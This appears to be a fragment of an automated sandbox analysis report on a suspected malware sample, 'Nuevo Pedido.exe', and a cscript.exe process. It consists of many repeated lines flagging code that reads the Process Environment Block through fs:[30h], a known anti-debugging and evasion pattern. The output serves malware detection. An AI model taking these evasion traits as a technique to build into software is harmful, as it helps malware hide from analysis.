Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E2397 mov eax, dword ptr fs:[00000030h] 3_2_019E2397
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A85BA5 mov eax, dword ptr fs:[00000030h] 3_2_01A85BA5
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019EB390 mov eax, dword ptr fs:[00000030h] 3_2_019EB390
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019C1B8F mov eax, dword ptr fs:[00000030h] 3_2_019C1B8F
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019C1B8F mov eax, dword ptr fs:[00000030h] 3_2_019C1B8F
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A6D380 mov ecx, dword ptr fs:[00000030h] 3_2_01A6D380
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A7138A mov eax, dword ptr fs:[00000030h] 3_2_01A7138A
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E4BAD mov eax, dword ptr fs:[00000030h] 3_2_019E4BAD
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E4BAD mov eax, dword ptr fs:[00000030h] 3_2_019E4BAD
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E4BAD mov eax, dword ptr fs:[00000030h] 3_2_019E4BAD
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A353CA mov eax, dword ptr fs:[00000030h] 3_2_01A353CA
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A353CA mov eax, dword ptr fs:[00000030h] 3_2_01A353CA
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019DDBE9 mov eax, dword ptr fs:[00000030h] 3_2_019DDBE9
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E03E2 mov eax, dword ptr fs:[00000030h] 3_2_019E03E2
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E03E2 mov eax, dword ptr fs:[00000030h] 3_2_019E03E2
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E03E2 mov eax, dword ptr fs:[00000030h] 3_2_019E03E2
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E03E2 mov eax, dword ptr fs:[00000030h] 3_2_019E03E2
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E03E2 mov eax, dword ptr fs:[00000030h] 3_2_019E03E2
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E03E2 mov eax, dword ptr fs:[00000030h] 3_2_019E03E2
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A7131B mov eax, dword ptr fs:[00000030h] 3_2_01A7131B
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019BF358 mov eax, dword ptr fs:[00000030h] 3_2_019BF358
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019BDB40 mov eax, dword ptr fs:[00000030h] 3_2_019BDB40
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E3B7A mov eax, dword ptr fs:[00000030h] 3_2_019E3B7A
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A88B58 mov eax, dword ptr fs:[00000030h] 3_2_01A88B58
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019BDB60 mov ecx, dword ptr fs:[00000030h] 3_2_019BDB60
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019ED294 mov eax, dword ptr fs:[00000030h] 3_2_019ED294
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019CAAB0 mov eax, dword ptr fs:[00000030h] 3_2_019CAAB0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019EFAB0 mov eax, dword ptr fs:[00000030h] 3_2_019EFAB0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019B52A5 mov eax, dword ptr fs:[00000030h] 3_2_019B52A5
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E2ACB mov eax, dword ptr fs:[00000030h] 3_2_019E2ACB
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E2AE4 mov eax, dword ptr fs:[00000030h] 3_2_019E2AE4
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019D3A1C mov eax, dword ptr fs:[00000030h] 3_2_019D3A1C
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019B5210 mov eax, dword ptr fs:[00000030h] 3_2_019B5210
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019B5210 mov ecx, dword ptr fs:[00000030h] 3_2_019B5210
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019BAA16 mov eax, dword ptr fs:[00000030h] 3_2_019BAA16
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019C8A0A mov eax, dword ptr fs:[00000030h] 3_2_019C8A0A
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A7AA16 mov eax, dword ptr fs:[00000030h] 3_2_01A7AA16
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F4A2C mov eax, dword ptr fs:[00000030h] 3_2_019F4A2C
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A6B260 mov eax, dword ptr fs:[00000030h] 3_2_01A6B260
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A88A62 mov eax, dword ptr fs:[00000030h] 3_2_01A88A62
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019B9240 mov eax, dword ptr fs:[00000030h] 3_2_019B9240
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F927A mov eax, dword ptr fs:[00000030h] 3_2_019F927A
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A7EA55 mov eax, dword ptr fs:[00000030h] 3_2_01A7EA55
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A44257 mov eax, dword ptr fs:[00000030h] 3_2_01A44257
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A805AC mov eax, dword ptr fs:[00000030h] 3_2_01A805AC
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019EFD9B mov eax, dword ptr fs:[00000030h] 3_2_019EFD9B
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019B2D8A mov eax, dword ptr fs:[00000030h] 3_2_019B2D8A
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E2581 mov eax, dword ptr fs:[00000030h] 3_2_019E2581
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E1DB5 mov eax, dword ptr fs:[00000030h] 3_2_019E1DB5
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E35A1 mov eax, dword ptr fs:[00000030h] 3_2_019E35A1
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A7FDE2 mov eax, dword ptr fs:[00000030h] 3_2_01A7FDE2
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A68DF1 mov eax, dword ptr fs:[00000030h] 3_2_01A68DF1
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A36DC9 mov eax, dword ptr fs:[00000030h] 3_2_01A36DC9
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A36DC9 mov ecx, dword ptr fs:[00000030h] 3_2_01A36DC9
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019CD5E0 mov eax, dword ptr fs:[00000030h] 3_2_019CD5E0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A3A537 mov eax, dword ptr fs:[00000030h] 3_2_01A3A537
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A88D34 mov eax, dword ptr fs:[00000030h] 3_2_01A88D34
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A7E539 mov eax, dword ptr fs:[00000030h] 3_2_01A7E539
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E4D3B mov eax, dword ptr fs:[00000030h] 3_2_019E4D3B
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h] 3_2_019C3D34
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019BAD30 mov eax, dword ptr fs:[00000030h] 3_2_019BAD30
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019D7D50 mov eax, dword ptr fs:[00000030h] 3_2_019D7D50
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F3D43 mov eax, dword ptr fs:[00000030h] 3_2_019F3D43
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A33540 mov eax, dword ptr fs:[00000030h] 3_2_01A33540
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019DC577 mov eax, dword ptr fs:[00000030h] 3_2_019DC577
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019C849B mov eax, dword ptr fs:[00000030h] 3_2_019C849B
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A36CF0 mov eax, dword ptr fs:[00000030h] 3_2_01A36CF0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A714FB mov eax, dword ptr fs:[00000030h] 3_2_01A714FB
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A88CD6 mov eax, dword ptr fs:[00000030h] 3_2_01A88CD6
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h] 3_2_01A71C06
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A8740D mov eax, dword ptr fs:[00000030h] 3_2_01A8740D
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A36C0A mov eax, dword ptr fs:[00000030h] 3_2_01A36C0A
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019EBC2C mov eax, dword ptr fs:[00000030h] 3_2_019EBC2C
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019EA44B mov eax, dword ptr fs:[00000030h] 3_2_019EA44B
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019D746D mov eax, dword ptr fs:[00000030h] 3_2_019D746D
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A4C450 mov eax, dword ptr fs:[00000030h] 3_2_01A4C450
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019C8794 mov eax, dword ptr fs:[00000030h] 3_2_019C8794
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A37794 mov eax, dword ptr fs:[00000030h] 3_2_01A37794
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F37F5 mov eax, dword ptr fs:[00000030h] 3_2_019F37F5
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019DF716 mov eax, dword ptr fs:[00000030h] 3_2_019DF716
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019EA70E mov eax, dword ptr fs:[00000030h] 3_2_019EA70E
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A8070D mov eax, dword ptr fs:[00000030h] 3_2_01A8070D
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019EE730 mov eax, dword ptr fs:[00000030h] 3_2_019EE730
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A4FF10 mov eax, dword ptr fs:[00000030h] 3_2_01A4FF10
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019B4F2E mov eax, dword ptr fs:[00000030h] 3_2_019B4F2E
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A88F6A mov eax, dword ptr fs:[00000030h] 3_2_01A88F6A
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019CEF40 mov eax, dword ptr fs:[00000030h] 3_2_019CEF40
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019CFF60 mov eax, dword ptr fs:[00000030h] 3_2_019CFF60
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A346A7 mov eax, dword ptr fs:[00000030h] 3_2_01A346A7
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A80EA5 mov eax, dword ptr fs:[00000030h] 3_2_01A80EA5
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A4FE87 mov eax, dword ptr fs:[00000030h] 3_2_01A4FE87
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E36CC mov eax, dword ptr fs:[00000030h] 3_2_019E36CC
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F8EC7 mov eax, dword ptr fs:[00000030h] 3_2_019F8EC7
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A6FEC0 mov eax, dword ptr fs:[00000030h] 3_2_01A6FEC0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A88ED6 mov eax, dword ptr fs:[00000030h] 3_2_01A88ED6
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E16E0 mov ecx, dword ptr fs:[00000030h] 3_2_019E16E0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019C76E2 mov eax, dword ptr fs:[00000030h] 3_2_019C76E2
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019EA61C mov eax, dword ptr fs:[00000030h] 3_2_019EA61C
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A6FE3F mov eax, dword ptr fs:[00000030h] 3_2_01A6FE3F
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019BC600 mov eax, dword ptr fs:[00000030h] 3_2_019BC600
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E8E00 mov eax, dword ptr fs:[00000030h] 3_2_019E8E00
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A71608 mov eax, dword ptr fs:[00000030h] 3_2_01A71608
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019BE620 mov eax, dword ptr fs:[00000030h] 3_2_019BE620
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019C7E41 mov eax, dword ptr fs:[00000030h] 3_2_019C7E41
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A7AE44 mov eax, dword ptr fs:[00000030h] 3_2_01A7AE44
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019DAE73 mov eax, dword ptr fs:[00000030h] 3_2_019DAE73
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019C766D mov eax, dword ptr fs:[00000030h] 3_2_019C766D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0479746D mov eax, dword ptr fs:[00000030h] 16_2_0479746D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047AA44B mov eax, dword ptr fs:[00000030h] 16_2_047AA44B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04848CD6 mov eax, dword ptr fs:[00000030h] 16_2_04848CD6
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047ABC2C mov eax, dword ptr fs:[00000030h] 16_2_047ABC2C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F6C0A mov eax, dword ptr fs:[00000030h] 16_2_047F6C0A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_048314FB mov eax, dword ptr fs:[00000030h] 16_2_048314FB
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h] 16_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0484740D mov eax, dword ptr fs:[00000030h] 16_2_0484740D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F6CF0 mov eax, dword ptr fs:[00000030h] 16_2_047F6CF0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0480C450 mov eax, dword ptr fs:[00000030h] 16_2_0480C450
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0478849B mov eax, dword ptr fs:[00000030h] 16_2_0478849B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0479C577 mov eax, dword ptr fs:[00000030h] 16_2_0479C577
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_048405AC mov eax, dword ptr fs:[00000030h] 16_2_048405AC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04797D50 mov eax, dword ptr fs:[00000030h] 16_2_04797D50
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B3D43 mov eax, dword ptr fs:[00000030h] 16_2_047B3D43
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F3540 mov eax, dword ptr fs:[00000030h] 16_2_047F3540
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A4D3B mov eax, dword ptr fs:[00000030h] 16_2_047A4D3B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0477AD30 mov eax, dword ptr fs:[00000030h] 16_2_0477AD30
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047FA537 mov eax, dword ptr fs:[00000030h] 16_2_047FA537
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h] 16_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0483FDE2 mov eax, dword ptr fs:[00000030h] 16_2_0483FDE2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04828DF1 mov eax, dword ptr fs:[00000030h] 16_2_04828DF1
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0478D5E0 mov eax, dword ptr fs:[00000030h] 16_2_0478D5E0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04848D34 mov eax, dword ptr fs:[00000030h] 16_2_04848D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F6DC9 mov eax, dword ptr fs:[00000030h] 16_2_047F6DC9
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F6DC9 mov ecx, dword ptr fs:[00000030h] 16_2_047F6DC9
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0483E539 mov eax, dword ptr fs:[00000030h] 16_2_0483E539
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A1DB5 mov eax, dword ptr fs:[00000030h] 16_2_047A1DB5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A35A1 mov eax, dword ptr fs:[00000030h] 16_2_047A35A1
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047AFD9B mov eax, dword ptr fs:[00000030h] 16_2_047AFD9B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A2581 mov eax, dword ptr fs:[00000030h] 16_2_047A2581
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04772D8A mov eax, dword ptr fs:[00000030h] 16_2_04772D8A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0480FE87 mov eax, dword ptr fs:[00000030h] 16_2_0480FE87
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0479AE73 mov eax, dword ptr fs:[00000030h] 16_2_0479AE73
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0479AE73 mov eax, dword ptr fs:[00000030h] 16_2_0479AE73
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0479AE73 mov eax, dword ptr fs:[00000030h] 16_2_0479AE73
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0479AE73 mov eax, dword ptr fs:[00000030h] 16_2_0479AE73
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0479AE73 mov eax, dword ptr fs:[00000030h] 16_2_0479AE73
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0478766D mov eax, dword ptr fs:[00000030h] 16_2_0478766D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04840EA5 mov eax, dword ptr fs:[00000030h] 16_2_04840EA5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04840EA5 mov eax, dword ptr fs:[00000030h] 16_2_04840EA5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04840EA5 mov eax, dword ptr fs:[00000030h] 16_2_04840EA5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h] 16_2_04787E41
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h] 16_2_04787E41
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h] 16_2_04787E41
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h] 16_2_04787E41
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h] 16_2_04787E41
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h] 16_2_04787E41
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0482FEC0 mov eax, dword ptr fs:[00000030h] 16_2_0482FEC0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04848ED6 mov eax, dword ptr fs:[00000030h] 16_2_04848ED6
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0477E620 mov eax, dword ptr fs:[00000030h] 16_2_0477E620
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047AA61C mov eax, dword ptr fs:[00000030h] 16_2_047AA61C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047AA61C mov eax, dword ptr fs:[00000030h] 16_2_047AA61C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0477C600 mov eax, dword ptr fs:[00000030h] 16_2_0477C600
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0477C600 mov eax, dword ptr fs:[00000030h] 16_2_0477C600
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0477C600 mov eax, dword ptr fs:[00000030h] 16_2_0477C600
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A8E00 mov eax, dword ptr fs:[00000030h] 16_2_047A8E00
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04831608 mov eax, dword ptr fs:[00000030h] 16_2_04831608
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A16E0 mov ecx, dword ptr fs:[00000030h] 16_2_047A16E0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047876E2 mov eax, dword ptr fs:[00000030h] 16_2_047876E2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A36CC mov eax, dword ptr fs:[00000030h] 16_2_047A36CC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B8EC7 mov eax, dword ptr fs:[00000030h] 16_2_047B8EC7
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0482FE3F mov eax, dword ptr fs:[00000030h] 16_2_0482FE3F
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0483AE44 mov eax, dword ptr fs:[00000030h] 16_2_0483AE44
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0483AE44 mov eax, dword ptr fs:[00000030h] 16_2_0483AE44
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F46A7 mov eax, dword ptr fs:[00000030h] 16_2_047F46A7
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0478FF60 mov eax, dword ptr fs:[00000030h] 16_2_0478FF60
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0478EF40 mov eax, dword ptr fs:[00000030h] 16_2_0478EF40
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047AE730 mov eax, dword ptr fs:[00000030h] 16_2_047AE730
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04774F2E mov eax, dword ptr fs:[00000030h] 16_2_04774F2E
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04774F2E mov eax, dword ptr fs:[00000030h] 16_2_04774F2E
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0479F716 mov eax, dword ptr fs:[00000030h] 16_2_0479F716
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047AA70E mov eax, dword ptr fs:[00000030h] 16_2_047AA70E
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047AA70E mov eax, dword ptr fs:[00000030h] 16_2_047AA70E
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0484070D mov eax, dword ptr fs:[00000030h] 16_2_0484070D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0484070D mov eax, dword ptr fs:[00000030h] 16_2_0484070D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B37F5 mov eax, dword ptr fs:[00000030h] 16_2_047B37F5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0480FF10 mov eax, dword ptr fs:[00000030h] 16_2_0480FF10
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0480FF10 mov eax, dword ptr fs:[00000030h] 16_2_0480FF10
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F7794 mov eax, dword ptr fs:[00000030h] 16_2_047F7794
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F7794 mov eax, dword ptr fs:[00000030h] 16_2_047F7794
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F7794 mov eax, dword ptr fs:[00000030h] 16_2_047F7794
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04788794 mov eax, dword ptr fs:[00000030h] 16_2_04788794
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04848F6A mov eax, dword ptr fs:[00000030h] 16_2_04848F6A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04790050 mov eax, dword ptr fs:[00000030h] 16_2_04790050
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04790050 mov eax, dword ptr fs:[00000030h] 16_2_04790050
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0480B8D0 mov eax, dword ptr fs:[00000030h] 16_2_0480B8D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0480B8D0 mov ecx, dword ptr fs:[00000030h] 16_2_0480B8D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0480B8D0 mov eax, dword ptr fs:[00000030h] 16_2_0480B8D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0480B8D0 mov eax, dword ptr fs:[00000030h] 16_2_0480B8D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0480B8D0 mov eax, dword ptr fs:[00000030h] 16_2_0480B8D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0480B8D0 mov eax, dword ptr fs:[00000030h] 16_2_0480B8D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0478B02A mov eax, dword ptr fs:[00000030h] 16_2_0478B02A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0478B02A mov eax, dword ptr fs:[00000030h] 16_2_0478B02A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0478B02A mov eax, dword ptr fs:[00000030h] 16_2_0478B02A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0478B02A mov eax, dword ptr fs:[00000030h] 16_2_0478B02A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A002D mov eax, dword ptr fs:[00000030h] 16_2_047A002D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A002D mov eax, dword ptr fs:[00000030h] 16_2_047A002D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A002D mov eax, dword ptr fs:[00000030h] 16_2_047A002D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A002D mov eax, dword ptr fs:[00000030h] 16_2_047A002D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A002D mov eax, dword ptr fs:[00000030h] 16_2_047A002D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F7016 mov eax, dword ptr fs:[00000030h] 16_2_047F7016
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F7016 mov eax, dword ptr fs:[00000030h] 16_2_047F7016
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F7016 mov eax, dword ptr fs:[00000030h] 16_2_047F7016
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04844015 mov eax, dword ptr fs:[00000030h] 16_2_04844015
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04844015 mov eax, dword ptr fs:[00000030h] 16_2_04844015
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047758EC mov eax, dword ptr fs:[00000030h] 16_2_047758EC
